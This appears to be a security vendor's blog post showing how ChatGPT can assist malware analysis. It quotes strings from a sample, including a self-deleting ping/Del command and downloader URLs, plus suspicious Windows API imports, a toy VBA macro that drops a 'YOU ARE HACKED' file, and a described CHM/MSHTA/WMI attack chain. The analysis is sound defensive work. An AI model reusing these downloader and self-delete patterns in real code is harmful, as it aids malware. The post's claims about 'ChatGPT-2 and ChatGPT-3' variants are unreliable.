Free Access
Blog

ChatGPT and Malware Analysis – ThreatMon

This image is about ChatGPT and malware analysis.

What is ChatGPT?

ChatGPT is an AI driven chatbot launched by OpenAI in November 2022. ChatGPT is a variant of the GPT (Generative Pre-training Transformer) language model that has been fine-tuned for the task of conversational response generation. Like other GPT models, ChatGPT uses a transformer architecture to process and generate text. However, it has been trained on a large dataset of human-human conversations in order to better understand the nuances and context of natural language exchanges. This allows it to generate responses that are more human-like and appropriate for a given conversation. It is trained using Reinforcement Learning from Human Feedback (RLHF).

One of the main advantages of ChatGPT is its ability to generate responses that are relevant and coherent within the context of a conversation. It can also handle a wide range of topics and styles of communication, making it a useful tool for tasks such as chatbots, customer service, and language translation.

There are also several variations of ChatGPT that have been developed, such as ChatGPT-2 and ChatGPT-3, which are even larger and more powerful language models than the original ChatGPT. These newer models have been trained on even larger datasets and can generate even more human-like responses.

Overall, ChatGPT is a powerful language model that has the ability to understand and generate human-like responses in a conversational context, making it a valuable tool for a variety of applications.

How Do We Use ChatGPT for Malware Analysis?

First of all , we asked this question to ChatGPT 🙂 Let’s see what answers we got.

Q:How can we use ChatGPT for our Malware Analysis and Reverse Engineering purposes?

In addition to what ChatGPT previously mentioned, it can also:
  • Analyze data obtained from simple static analysis and produce logical comments for us. It can take the data gathered through static analysis, such as code structure and function calls, and use that information to generate comments that provide insight into the purpose and behavior of the code.
  • Analyze malicious macro code found in malicious office documents. It can examine macro code, which is a type of code that can be embedded in office documents and executed upon opening the document, and determine if it is malicious in nature.
  • Deobfuscate code for us. It can take code that has been deliberately made difficult to understand, such as through the use of code obfuscation techniques, and make it more readable and understandable for us.
  • Analyze code and explain its purpose to us. It can take code and, through analysis, determine its intended behavior and provide an explanation of what the code is trying to accomplish.
  • Provide mitigations for any potential security issues it identifies. This means that it can offer suggestions for how to address any vulnerabilities or potential attack vectors that it discovers during its analysis, helping to protect against potential security threats.

 

Let’s say we have an executable but we do not know its capabilities. There are interesting strings:

and suspicious API Calls at the Import Address Table:

Let’s ask ChatGPT.

Q:We have strings taken from a file that we suspect to be malware. Can you review them and give us your comments? What do you think the purpose could be?

  • exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q “%s
  • http://ssl-345345345.helpdeskbros.local/favicon.ico
  • C:\Users\Public\Documents\CR43333.dat.exe
  • Mozilla/5.0
  • http://verysuspicioussite.com
  • ping 1.1.1.1 -n 1 -w 3000 > Nul & C:\Users\Public\Documents\CR43333.dat.exe
  • open
  • ineIGenu
 

And it can tell us what these API Calls are used for:

Q:There are suspicious API Calls in the same Malware , why might it be using them ?

  • GetCurrentProcessId
  • URLDownloadToFileW
  • InternetOpenW
  • InternetOpenUrlW
  • CreateProcessW
  • GetCurrentThreadId
  • TerminateProcess
  • ShellExecuteW
  • IsProcessorFeaturePresent
  • IsDebuggerPresent
  • QueryPerformanceCounter
 

Malicious Document Analysis

Suppose that we have a suspicious Office Document with extension “docm” which is macro enabled. First we will extract the macro code from the file.

The code is easy to read but we will ask ChatGPT.

Q:Hi I have a Macro Code extracted from a malicious docm file. What do you think this code is trying to do?

“Sub OpenCalculatorAndCreateFile()
    Dim FilePath As String
    Shell “calc.exe”, vbNormalFocus
    FilePath = CreateObject(“WScript.Shell”).SpecialFolders(“Desktop”) & “\HAHAHA.txt”
    Open FilePath For Output As #1
    Print #1, “YOU ARE HACKED XD”
    Close #1
End Sub”

Did you know that we used ChatGPT in our latest blog post? Let’s see how it helped us.

First, we gave the VBScript and ask ChatGPT to deobfuscate and explain us what this code is trying to do.

Q: Can you deobfuscate this code ? What is this trying to do?

Then we ask ChatGPT for mitigation.

Q:We have an APT Group that used malicious CHM files in this attack. CHM File contains a malicious htm file which displays the decoy windows and executes the malicious code. Malicious code use HHCtrl ActiveX and MSHTA to execute remote .htm file. HTM file contains VBScript. WMI (Windows Management Instrumentation) is used by this VBScript to connect to the local system and create a new process using the CreateObject method to create an instance of the “WbemScripting.SWbemLocator” class and the ConnectServer method to connect to the local machine. Then it creates an instance of the “Win32_ProcessStartup” class and “Win32_Process” class, these classes are used to configure and start a new process. Give me mitigations in detail.

 

Conclusion

ChatGPT is an AI-powered chatbot developed by OpenAI that uses a transformer architecture to process and generate text. It has been trained on a large dataset of human-human conversations, allowing it to generate responses that are more human-like and appropriate for a given conversation. ChatGPT can be used for tasks such as chatbots, customer service, and language translation. One of the main advantages of ChatGPT is its ability to generate responses that are relevant and coherent within the context of a conversation.

In addition to its conversational capabilities, ChatGPT can also be used for malware analysis and reverse engineering. It can analyze data obtained from simple static analysis and produce logical comments for the purpose and behavior of the code. It can also analyze malicious macro code found in office documents and deobfuscate code. ChatGPT can also analyze code and explain its purpose, as well as provide mitigations for any potential security issues it identifies.

More posts

This image is about monthly vulnerabilities for September 2024.
Peek into Monthly Vulnerabilities: September 2024
October 9, 2024
This image is about the ServiceNow data leak.
ServiceNow Data Leak: Risks of Misconfigured Knowledge Bases
September 18, 2024
This image is about monthly vulnerabilities for July 2024.
Peek into Monthly Vulnerabilities: July 2024
August 12, 2024
This image is about cyber strategies for the Paris Olympics 2024.
Securing the Games: Cyber Strategies for Paris Olympics 2024
August 9, 2024
This image is about Russian influence operations targeting the Paris Olympics 2024.
Hunter’s Lens: Russian Influence Operations Targeting the Paris Olympics 2024
August 2, 2024
View All
advanced divider

Share this article

Found it interesting? Don’t hesitate to share it to wow your friends or colleagues
advanced divider
Subscribe to our blog newsletter to follow the latest posts
Stay informed with the latest updates, expert insights, and in-depth analysis from ThreatMon’s cybersecurity intelligence. Subscribe to receive critical news, threat reports, and industry trends directly in your inbox, helping you stay ahead of emerging cyber threats.

Platform

Subscriptions

Solutions

Resources

Partner

Company

© 2024 ThreatMon. All rights reserved.
X-twitter Linkedin-in Github